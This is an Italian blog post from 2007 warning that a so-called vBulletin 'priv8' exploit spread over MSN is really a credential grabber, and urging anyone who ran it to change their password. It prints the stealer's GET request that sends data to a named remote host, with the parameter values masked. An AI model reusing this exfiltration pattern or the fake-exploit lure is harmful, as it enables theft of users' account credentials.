Ultimamente gira per msn un file rar contenente un fantomatico exploit per tutte le versioni di vBulletin.
Il file in questione e' un .EXE di nome: vBullettin_ALL_priv8_exploit.
Eseguendo una analisi sul file con un debugger si nota immediatamente che si tratta di un fake. Infatti esso e' un msn grabber cammuffato da 0day.
Il file esegue la seguente richiesta GET:
GET /vbull.php?hack=*****&web=****************&Dat=*******************=HTTP/1.1
L'host remoto e': http://www.vbulletin.altervista.org
Invitiamo chiunque lo abbia eseguito a modificare la propria password
Fonte
Emoticon Gratis per Windows Live Messenger
03 settembre 2007
vBullettin_ALL_priv8_exploit
Iscriviti a:
Commenti sul post (Atom)
1 commenti:
Ciao! Sono il webmaster di http://marcolancini.wordpress.com e volevo dirti che hai ragione, scusa per la mia mancanza. Ho rimediato prontamente. Volevo solo chiederti un'altra cosa: come sei riuscito ad aggiungere al tuo sito gli Annunci di Google? Perchè il mio non supporta i javascript. Grazie.
Posta un commento